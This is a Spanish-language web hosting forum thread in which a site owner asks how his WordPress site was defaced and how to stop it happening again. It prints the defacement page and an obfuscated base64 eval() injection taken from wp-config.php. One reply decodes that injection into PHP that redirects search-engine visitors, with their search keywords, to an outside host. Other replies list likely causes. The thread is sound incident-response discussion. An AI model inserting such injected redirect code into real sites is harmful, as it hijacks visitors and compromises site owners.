Foros del Web » Administración de Sistemas » Shared Hosting y VPS »

Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

Estas en el tema de Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen en el foro de Shared Hosting y VPS en Foros del Web. Buenos días, no estoy seguro de que sea aquí donde deba publicar este post, pero buej, allá va. El asunto es que esta mañana me ...
  #1 (permalink)  
Antiguo 19/05/2010, 07:55
Avatar de rogertm
Mod->Cuba
 
Fecha de Ingreso: julio-2005
Ubicación: /home/Cuba/Habana/rogertm/
Mensajes: 2.922
Antigüedad: 16 años, 4 meses
Puntos: 638
Exclamación Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

Buenos días, no estoy seguro de que sea aquí donde deba publicar este post, pero buej, allá va.

El asunto es que esta mañana me entero de que me han hackeado uno de mis sitios (Wordpress) hospedado en Site5.com. Lo que hicieron fue renombrar el archivo index.php a index2.php, colgaron un nuevo index.php con el siguiente código:
Código HTML:
Ver original
  1. <meta http-equiv="Content-Language" content="en-us">
  2. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  3. </head>
  4. <body bgcolor="#000000">
  5. <div align="center">
  6.     <pre class="style1"><span class="style10"><strong><font size="3" color="#FFFFFF">Ups don't Worry, Your System is Save</font></strong></span></pre>
  7. </div>
  8. <div align="center">
  9.     <pre id="line1" class="style1"><font color="#FFFFFF" size="6"><strong><span class="style10">::: ThiS Site Has Been Hacked :::</span></strong></font></pre>
  10. </div>
  11. <p align="center"><b><font face="Calisto MT" size="7" color="#FF0000">Indonesian</font><font color="#FFFFFF" face="Calisto MT" size="7">
  12. Hacker</font></b></p>
  13. <p align="center"><b><font face="Courier New" size="4" color="#FFFFFF">Contact :
  14. </body>
  15. </html>

Por suerte decía don't Worry, Your System is Save... y en el wp-config.php me metieron un script injection:

Código PHP:
Ver original
  1. <?php/*
  2. eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJnb29nbGUiKSkgewoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiYiKSkgewoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNlIHsKCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cgp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRocnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));*/
  3.  
  4. // A partir de aquí todo estaba correctamente
  5.  
  6. ?>

Hace poco me pasó algo muy parecido con el sitio que administro en mi trabajo.

Preguntas:
  • ¿Cómo es que logran hacer eso?
  • ¿Qué medidas puedo tomar para que no suceda más?
  • ¿Debería cambiar el password de conexión a la base de datos?
Saludos y muchas gracias de antemano...
__________________
Friki y Blogger por Cuenta Propia:213
Twenty'em: Theming is Prose
  #2 (permalink)  
Antiguo 19/05/2010, 08:23
Avatar de JoshMex
Moderador Webhosting
 
Fecha de Ingreso: enero-2006
Mensajes: 4.057
Antigüedad: 15 años, 10 meses
Puntos: 166
Respuesta: Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

- Algún script con algún bug, actualiza tus scripts a las últimas versiones.

- Robo de los datos de tu cuenta FTP, revisa que tu equipo tenga todos los parches instalados, existe un virus llamado gumblar que aprovecha una vulnerabilidad y roba de tus clientes ftp los datos de tus cuentas ftp; cambia el password de tus cuentas ftp
__________________
JoshMex
Desarrollador Plataforma Microsoft / Windows / ASP / ASP.NET / SQL Server
Es inútil hacer cualquier cosa a prueba de tontos, porque los tontos son muy ingeniosos
  #3 (permalink)  
Antiguo 19/05/2010, 08:38
Avatar de netandino  
Fecha de Ingreso: mayo-2009
Ubicación: Perú
Mensajes: 238
Antigüedad: 12 años, 7 meses
Puntos: 3
Respuesta: Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

Pasa en muchas veces cuando uno usa csm themes o similares free y estos traen huecos o cuando hace uso de scrips nulled. al hacer esto terminan siendo defaseados.

Los recomendable es revisar al detalle sus scripts y tener actualizados todos sus scripts, evite también el uso de script nulled en muchas veces apropósito dejan hoyos para poder tomar su cuenta.

Saludos
__________________
Net Andino| Creando Nuevas Soluciones en Informática y Sistemas
Hosting, Streaming Shoutcast y Icecast en HE-AAC, TV Video, Dominios y más
  #4 (permalink)  
Antiguo 19/05/2010, 11:07
Avatar de WebTech
Hosting Moderator
 
Fecha de Ingreso: octubre-2005
Ubicación: East Coast
Mensajes: 5.399
Antigüedad: 16 años, 1 mes
Puntos: 162
Respuesta: Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

Esto puede suceder por:

* Scripts desactualizados, vulnerables
* Excesivo uso de permisos en archivos y carpetas
* Robo de contraseñas
* Infección a nivel de servidor

Pregunta a tu proveedor de hosting, ellos deberían poder decirte cómo fueron modificados los archivos y de allí evaluar si fue por ftp, php-apache, etc.

Saludos,
__________________
Infranetworking.com - Expertos en Hosting Multidominio, Cloud Hosting, Servidores Dedicados y Administración de Servidores Linux
  #5 (permalink)  
Antiguo 19/05/2010, 12:30
Avatar de rogertm
Mod->Cuba
 
Fecha de Ingreso: julio-2005
Ubicación: /home/Cuba/Habana/rogertm/
Mensajes: 2.922
Antigüedad: 16 años, 4 meses
Puntos: 638
Respuesta: Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

OK, gracias a todos por las recomendaciones, ya iré revisando el asunto a ver donde esté el hueco... Por cierto, que es exactamente script nulled? He buscado por Internet y no he encontrado ninguna definición del término...

Gracias...
__________________
Friki y Blogger por Cuenta Propia:213
Twenty'em: Theming is Prose
  #6 (permalink)  
Antiguo 19/05/2010, 14:10
Avatar de WebTech
Hosting Moderator
 
Fecha de Ingreso: octubre-2005
Ubicación: East Coast
Mensajes: 5.399
Antigüedad: 16 años, 1 mes
Puntos: 162
Respuesta: Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

Cita:
script nulled
Un script crackeado, ilegal por supuesto, puedes encontrar foros y otras aplicaciones PHP donde puedes usarlas sin restricciones de igual manera que las hubieses pagado.

Saludos,
__________________
Infranetworking.com - Expertos en Hosting Multidominio, Cloud Hosting, Servidores Dedicados y Administración de Servidores Linux
  #7 (permalink)  
Antiguo 19/05/2010, 14:36
Avatar de rogertm
Mod->Cuba
 
Fecha de Ingreso: julio-2005
Ubicación: /home/Cuba/Habana/rogertm/
Mensajes: 2.922
Antigüedad: 16 años, 4 meses
Puntos: 638
Respuesta: Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

Gracias, por si sirve de algo aquí dejo la "Hoja de Servicios" del marine que nos ha visitado esta mañana http://zone-h.net/archive/notifier=black_raptor/
__________________
Friki y Blogger por Cuenta Propia:213
Twenty'em: Theming is Prose
  #8 (permalink)  
Antiguo 22/05/2010, 19:50
 
Fecha de Ingreso: diciembre-2004
Ubicación: Madrid
Mensajes: 43
Antigüedad: 17 años
Puntos: 0
Respuesta: Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

Preguntaste a ver si también habían sido hackeadas webs de vecinos tuyos en el mismo servidor?
  #9 (permalink)  
Antiguo 22/05/2010, 22:56
Avatar de caelus  
Fecha de Ingreso: mayo-2010
Ubicación: /home
Mensajes: 91
Antigüedad: 11 años, 6 meses
Puntos: 5
Respuesta: Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

Quizás sea mejor contratar un webmaster profesional que diseñe el sitio, en internet hay varios manuales/videos de cómo hackear (defasear en realidad) un sitio que usa wp mediante SQL inyection por ejemplo, ese es un método.

Saludos
  #10 (permalink)  
Antiguo 10/02/2012, 19:03
 
Fecha de Ingreso: diciembre-2011
Ubicación: durango
Mensajes: 6
Antigüedad: 10 años
Puntos: 1
Respuesta: Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

como hago para restaurar mi web si me paso exactamente lo mismo???? gracias
  #11 (permalink)  
Antiguo 11/02/2012, 09:25
 
Fecha de Ingreso: agosto-2005
Mensajes: 122
Antigüedad: 16 años, 3 meses
Puntos: 2
Respuesta: Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

Hola, por si te sirve de algo, esto es lo que hay en el wp-config:

Código PHP:
    if (stristr($_SERVER[HTTP_REFERER],"google")) {
    if (!
stristr($_SERVER[HTTP_REFERER],".nu") and !stristr($_SERVER[HTTP_REFERER],"site") and !stristr($_SERVER[HTTP_REFERER],"inurl")){
        
preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk);
        if (
stristr($kk[1],"&")) {
            
preg_match ("/(.*?)\&/",$kk[1],$key2);
            
$keyword=urldecode($key2[1]);
        }else {
            
$keyword=urldecode($kk[1]);
        }
        
header("Location: http://fgnfdfthrv.bee.pl/?q=".$keyword);
        exit();
    }

}elseif (
stristr($_SERVER[HTTP_REFERER],"yahoo")) {
preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
        
header("Location: http://fgnfdfthrv.bee.pl/?q=".$kk[1]);
        exit();
}elseif (
stristr($_SERVER[HTTP_REFERER],"bing")) {
preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
        
header("Location: http://fgnfdfthrv.bee.pl/?q=".$kk[1]);
        exit();

__________________
IberHosting - Alojamiento Web Linux
¡Aceptamos Bitcoins!
  #12 (permalink)  
Antiguo 11/02/2012, 09:29
Avatar de hasdpk  
Fecha de Ingreso: agosto-2011
Ubicación: $spain->city( 'Arucas' );
Mensajes: 1.800
Antigüedad: 10 años, 3 meses
Puntos: 297
Respuesta: Hackeado mi sitio (Ya solucionado) y quiero saber como lo hacen

Yo creo que este tema ya está más que solucionado, @ccota a reactivado el tema que se escribió en el 2010.

Etiquetas: solucionado, web-hosting
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 16:21.